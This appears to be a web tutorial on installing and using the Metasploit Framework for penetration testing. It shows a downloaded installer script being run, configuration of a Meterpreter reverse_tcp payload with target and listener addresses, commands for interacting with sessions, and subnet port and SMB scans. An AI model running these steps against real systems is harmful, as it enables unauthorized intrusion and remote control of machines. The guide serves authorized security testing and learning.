EN
ENNA

Getting Started Guide

How to Install and Use Metasploit

This guide covers installing the Metasploit Framework, navigating the console, searching for exploits, and running your first exploit against a test target.

Prerequisites

  • -Linux (Kali recommended) or macOS
  • -Root/sudo access
  • -A deliberately vulnerable target like Metasploitable for practice
Official Documentation
1

Install Metasploit

On Kali Linux, Metasploit is pre-installed. For other systems, use the installer script.

Kali (already installed)

msfconsole --version

Other Linux/macOS

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
2

Launch the Console

Start the Metasploit console. First launch initializes the database which takes a moment.

Start the database

sudo msfdb init

Launch console

msfconsole

Example output

msf6 >

Note: The database stores your scan results, credentials, and session history across sessions. Always initialize it before starting.

3

Search for Modules

Metasploit has thousands of exploit, auxiliary, and post-exploitation modules. Search by keyword, CVE, or platform.

Search by keyword

search apache

Search by CVE

search cve:2021-44228

Search by type

search type:exploit platform:windows smb
4

Use a Module

Select a module, configure its options, and understand what it does before running it.

Select module

use exploit/multi/handler

Show options

show options

Set target

set RHOSTS 192.168.1.100

Set payload

set PAYLOAD windows/meterpreter/reverse_tcp

Set listener

set LHOST 192.168.1.50

Show configuration

show options

Note: Always review options with 'show options' before running. RHOSTS is the target, LHOST is your machine. Never run exploits against systems you don't have explicit written authorization to test.

5

Run and Interact

Execute the module and interact with any sessions you get.

Run the exploit

exploit

List active sessions

sessions -l

Interact with session

sessions -i 1

Background session

background
6

Auxiliary Modules

Not everything is an exploit. Auxiliary modules handle scanning, enumeration, and information gathering.

Port scanner

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 22,80,443,445
run

SMB version scan

use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run

Note: Auxiliary modules are great for the reconnaissance phase. They're less invasive than exploits and help you understand the target environment.

Back to Metasploit FrameworkFull Documentation